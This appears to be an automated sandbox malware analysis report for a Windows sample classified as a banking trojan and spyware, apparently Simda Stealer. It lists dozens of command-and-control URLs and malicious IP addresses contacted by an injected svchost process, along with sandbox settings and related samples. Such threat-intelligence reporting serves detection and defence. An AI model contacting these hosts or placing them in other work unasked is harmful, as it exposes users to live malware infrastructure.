http://vocydyc.com/login.php	svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359008557.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://gadyneh.com/login.php	svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2581725706.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lysyvan.com/login.php	svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404361246.00000000087FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344516796.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2504670847.000000000331A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388123270.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393482937.000000000339B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344396822.0000000003399000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lykywid.com/login.php	svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3245948099.0000000008615000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3343594271.0000000008619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2802384900.0000000008611000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3401732575.0000000008619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341805017.0000000008619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2603580004.0000000008611000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321538396.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2596489806.0000000008611000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lyvyxyj.com/login.php	svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582641786.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2581725706.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ganyvyw.com/login.php	svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353793003.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2787365873.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351137108.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2764486074.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://qexylup.com/login.php	svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3283281392.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2153845839.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396706488.00000000086F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2155150601.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397272204.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151605214.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395827509.00000000086EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152199201.000000000338F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152200523.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2408435581.0000000008706000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://qexyhuv.com/login.php	svchost.exe, 00000002.00000003.2519569091.00000000087DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246166456.00000000086D1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2280606997.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281429661.000000000861B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279138625.00000000086D4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pumybuq.com/login.php	svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353785619.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353793003.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353676961.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359453590.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352880774.000000000878B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pufymyg.com/login.php	svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330154891.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328870829.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pupyteg.com/login.php	svchost.exe, 00000002.00000003.2385477507.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3283281392.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lymylij.com/login.php	svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607736058.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610102916.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604615321.0000000008783000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://qedyfog.com/login.php	svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330154891.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347564818.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pufylul.com/login.php	svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359008557.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2745079929.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://vojybef.com/login.php	svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384383810.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ganycuh.com/login.php	svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321434222.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
3.94.10.34	lygynud.com	United States	14618	AMAZON-AESUS	true
106.15.232.163	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	true
64.190.63.136	www.sedoparking.com	United States	11696	NBS11696US	false
72.52.179.174	pltraffic7.com	United States	32244	LIQUIDWEBUS	false
154.85.183.50	qegyval.com	Seychelles	134548	DXTL-HKDXTLTseungKwanOServiceHK	true
64.225.91.73	galynuh.com	United States	14061	DIGITALOCEAN-ASNUS	true
5.79.71.205	unknown	Netherlands	60781	LEASEWEB-NL-AMS-01NetherlandsNL	true
99.83.170.3	puzylyp.com	United States	16509	AMAZON-02US	true
52.34.198.229	lygyvuj.com	United States	16509	AMAZON-02US	true
75.2.71.199	unknown	United States	16509	AMAZON-02US	true
103.150.10.48	gtm-sg-6l13ukk0m05.qu200.com	unknown	59253	LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG	true
23.253.46.64	gahyqah.com	United States	19994	RACKSPACEUS	true
199.191.50.83	galyqaz.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
13.248.169.48	pupydeq.com	United States	16509	AMAZON-02US	true
103.224.212.210	lyxynyx.com	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
76.223.67.189	qexyhuv.com	United States	16509	AMAZON-02US	true
18.208.156.248	pupycag.com	United States	14618	AMAZON-AESUS	true
208.100.26.245	lyvyxor.com	United States	32748	STEADFASTUS	true
199.59.243.227	77026.bodis.com	United States	395082	BODIS-NJUS	false
103.224.182.252	vofycot.com	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	false
85.17.31.82	gatyfus.com	Netherlands	60781	LEASEWEB-NL-AMS-01NetherlandsNL	true
162.255.119.102	unknown	United States	22612	NAMECHEAP-NETUS	true
188.114.97.3	unknown	European Union	13335	CLOUDFLARENETUS	true
44.221.84.105	gadyciz.com	United States	14618	AMAZON-AESUS	true
154.212.231.82	gadyniw.com	Seychelles	133201	COMING-ASABCDEGROUPCOMPANYLIMITEDHK	true
188.114.96.3	lysyvan.com	European Union	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1553809
Start date and time:	2024-11-11 18:12:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	12
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Bpfz752pYZ.exe renamed because original name is a hash value
Original Sample Name:	5de240159b639483fb3674e6289e946e7c304293.exe
Detection:	MAL
Classification:	mal100.bank.troj.spyw.expl.evad.winEXE@13/67@2302/27
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 117 Number of non-executed functions: 211
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.23.209.130, 2.23.209.185, 2.23.209.182, 2.23.209.187, 2.23.209.137, 2.23.209.135, 2.23.209.179, 2.23.209.189, 2.23.209.133, 2.23.209.154, 2.23.209.140, 2.23.209.176, 2.23.209.144, 2.23.209.150, 2.23.209.158, 2.23.209.156, 2.23.209.149, 20.42.65.92, 20.42.73.29, 2.23.209.141, 2.23.209.177, 2.23.209.183, 52.168.117.173
Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Bpfz752pYZ.exe

Simulations

Behavior and APIs

Time	Type	Description
12:13:39	API Interceptor	10x Sleep call for process: WerFault.exe modified
12:13:56	API Interceptor	767222x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3.94.10.34	uavINoSIQh.exe	Get hash	malicious	Simda Stealer	Browse	lymyxid.com/login.php
	7DAKMhINGk.exe	Get hash	malicious	Simda Stealer	Browse	lymyxid.com/login.php
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	ctdtgwag.biz/wikoehfueo
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	ctdtgwag.biz/xyrpanl
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	gvijgjwkh.biz/maxlthgls
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	ypituyqsq.biz/grbkwbsae
	SetupRST.exe	Get hash	malicious	Unknown	Browse	ctdtgwag.biz/dpaslnrfmhydrsi
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	ctdtgwag.biz/dpop
	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	gvijgjwkh.biz/unx
	PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	gvijgjwkh.biz/lwgexo
106.15.232.163	uavINoSIQh.exe	Get hash	malicious	Simda Stealer	Browse	106.15.232.163:8000/dh/147287063_134827.html
106.15.232.163	7DAKMhINGk.exe	Get hash	malicious	Simda Stealer	Browse	106.15.232.163:8000/dh/147287063_472994.html
64.190.63.136	uavINoSIQh.exe	Get hash	malicious	Simda Stealer	Browse	ww16.vofycot.com/login.php?sub1=20241112-0408-09d4-8f1c-1de8890559b5
	7DAKMhINGk.exe	Get hash	malicious	Simda Stealer	Browse	ww16.vofycot.com/login.php?sub1=20241112-0352-0187-b8de-fd2bfab34f87
	http://afilias-grs.net	Get hash	malicious	Unknown	Browse	ww1.afilias-grs.net/search/tsc.php?ses=ogcIVruNZX5wQoGiwEz0Cq5PlN8zbbyp9Yq8dJFsn9poLX66IqkUhYVtAoJVb1AVRMXAtM65AaycMcjRMYAhdanh4H9VedEkUUDj7sc72cCMrn4Aq1jlr5Cf3Gyi37eSFszvqR2Z1jp_ezLSbToMVTMtkjDzo_LiuICxKqxU1ViilTwANTlr5WASZHBeFyN9K17m6E3E5ah97JIYIlDvt1EGmzUgNAGCXUTJBPD90zmFYlGgcsrWr9x5sRfW2BLGGMk8_iHKL0K_Iui8SV31UmfqbTFkZA14T8LZNQ7C4KUa_tBEFu-HS0j_I6Y4wh0p5m1bWRgdCQ_T3rEK468UUMrsAoUYxdvCJFLI5qVszq4s5qkp2l0O3xrQTkw&cv=2
	OjKmJJm2YT.exe	Get hash	malicious	Simda Stealer	Browse	ww16.vofycot.com/login.php?sub1=20240908-1854-132f-8c2f-134916a1e9d0
	5AFlyarMds.exe	Get hash	malicious	Simda Stealer	Browse	ww16.vofycot.com/login.php?sub1=20240908-1700-25c9-bc2e-507729a41b57
	uB31aJH4M0.exe	Get hash	malicious	Simda Stealer	Browse	ww16.vofycot.com/login.php?sub1=20240908-0453-259e-befa-1cc84c51963f
	Bonelessness.exe	Get hash	malicious	Simda Stealer	Browse	ww16.vofycot.com/login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7
	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	ww16.vofycot.com/login.php?sub1=20240824-0244-0577-915a-f20bc3a7af60
	http://efense.com/v3/__https:/www.duke-energy.com/find-it-duke__%3B!!No0KQ4w!udAqG0	Get hash	malicious	Unknown	Browse	sedoparking.com/frmpark/efense.com/Skenzor1/park.js
	http://leostop.com	Get hash	malicious	Unknown	Browse	ww1.leostop.com/search/tsc.php?200=NTkyMjkyNTEx&21=OC40Ni4xMjMuMzM=&681=MTcyMTk2Nzk4MTgxODg2ZmRhZDJjNzU3NTZlMTc0NmFkMjA5N2NhNTYx&crc=688a5d6af653e3a6b7501c60b740173e6added63&cv=1

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pupycag.com	uavINoSIQh.exe	Get hash	malicious	Simda Stealer	Browse	18.208.156.248
	7DAKMhINGk.exe	Get hash	malicious	Simda Stealer	Browse	18.208.156.248
	OjKmJJm2YT.exe	Get hash	malicious	Simda Stealer	Browse	18.208.156.248
	5AFlyarMds.exe	Get hash	malicious	Simda Stealer	Browse	18.208.156.248
	uB31aJH4M0.exe	Get hash	malicious	Simda Stealer	Browse	18.208.156.248
	M62eQtS9qP.exe	Get hash	malicious	Simda Stealer	Browse	18.208.156.248
	Bonelessness.exe	Get hash	malicious	Simda Stealer	Browse	18.208.156.248
	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	18.208.156.248
	spug64.exe	Get hash	malicious	Simda Stealer	Browse	34.174.78.212
	10627546311.zip	Get hash	malicious	Simda Stealer	Browse	199.21.76.77
pupydeq.com	uavINoSIQh.exe	Get hash	malicious	Simda Stealer	Browse	13.248.169.48
	7DAKMhINGk.exe	Get hash	malicious	Simda Stealer	Browse	13.248.169.48
	OjKmJJm2YT.exe	Get hash	malicious	Simda Stealer	Browse	13.248.169.48
	5AFlyarMds.exe	Get hash	malicious	Simda Stealer	Browse	13.248.169.48
	uB31aJH4M0.exe	Get hash	malicious	Simda Stealer	Browse	13.248.169.48
	M62eQtS9qP.exe	Get hash	malicious	Simda Stealer	Browse	13.248.169.48
	Bonelessness.exe	Get hash	malicious	Simda Stealer	Browse	13.248.169.48
	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	13.248.169.48
	spug64.exe	Get hash	malicious	Simda Stealer	Browse	13.248.169.48
	aAP32K91Qx.exe	Get hash	malicious	Simda Stealer	Browse	194.195.211.98
lyvyxor.com	uavINoSIQh.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	7DAKMhINGk.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	OjKmJJm2YT.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	5AFlyarMds.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	uB31aJH4M0.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	M62eQtS9qP.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	Bonelessness.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	spug64.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	kz2xIsjyEH.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NBS11696US	uavINoSIQh.exe	Get hash	malicious	Simda Stealer	Browse	64.190.63.136
	7DAKMhINGk.exe	Get hash	malicious	Simda Stealer	Browse	64.190.63.136
	sh4.elf	Get hash	malicious	Mirai	Browse	209.87.95.110
	jklarm5.elf	Get hash	malicious	Unknown	Browse	64.190.7.239
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	64.190.99.77
	ppc.elf	Get hash	malicious	Mirai	Browse	209.87.95.120
	powerpc.elf	Get hash	malicious	Mirai	Browse	209.87.95.115
	na.elf	Get hash	malicious	Mirai	Browse	209.87.95.125
	na.elf	Get hash	malicious	Mirai	Browse	209.87.95.125
	na.elf	Get hash	malicious	Mirai	Browse	209.87.95.125
